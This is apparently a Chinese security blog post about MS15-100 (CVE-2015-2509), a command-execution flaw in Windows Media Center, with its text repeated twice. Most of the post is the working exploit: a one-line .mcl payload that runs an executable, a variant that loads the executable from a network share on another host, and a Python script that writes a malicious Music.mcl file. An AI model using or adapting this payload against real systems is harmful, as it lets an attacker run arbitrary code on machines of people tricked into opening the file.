[0day]MS15-100 微软Media播放器命令执行漏洞
K8拉登哥哥发表于 2015-09-14 17:50:04
poc: https://www.exploit-db.com/exploits/38151/
<application run="calc.exe"/> 骄情的老外 就这么一句 还非用这python来装B
![[0day]MS15-100 微软Media播放器命令执行漏洞 - K8拉登哥哥 - K8拉登哥哥s Blog](http://img2.ph.126.net/KHKnEvO0yspIh1UJpc995g==/6630521308421337164.png "[0day]MS15-100 微软Media播放器命令执行漏洞 - K8拉登哥哥 - K8拉登哥哥s Blog")
可以使用 UNC路径 但对方点击时 会提示 是否给运行
<application run="\\192.168.85.143\Share\calc.exe"/>
![[0day]MS15-100 微软Media播放器命令执行漏洞 - K8拉登哥哥 - K8拉登哥哥s Blog](http://img1.ph.126.net/OTCFdU6fWRsml9uE3ZAAQQ==/6630172763235329512.png "[0day]MS15-100 微软Media播放器命令执行漏洞 - K8拉登哥哥 - K8拉登哥哥s Blog")
# Title: MS15-100 Windows Media Center Command Execution
# Date : 11/09/2015
# Author: R-73eN
# Software: Windows Media Center
# Tested : Windows 7 Ultimate
# CVE : 2015-2509
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
command = "calc.exe"
evil = '<application run="' + command + '"/>'
f = open("Music.mcl","w")
f.write(evil)
f.close()
print "\n[+] Music.mcl generated . . . [+]"
<application run="calc.exe"/> 骄情的老外 就这么一句 还非用这python来装B
可以使用 UNC路径 但对方点击时 会提示 是否给运行
<application run="\\192.168.85.143\Share\calc.exe"/>
# Title: MS15-100 Windows Media Center Command Execution
# Date : 11/09/2015
# Author: R-73eN
# Software: Windows Media Center
# Tested : Windows 7 Ultimate
# CVE : 2015-2509
banner = ""
banner += " ___ __ ____ _ _ \n"
banner +=" |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner +=" | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner +=" | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner +=" |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
command = "calc.exe"
evil = '<application run="' + command + '"/>'
f = open("Music.mcl","w")
f.write(evil)
f.close()
print "\n[+] Music.mcl generated . . . [+]"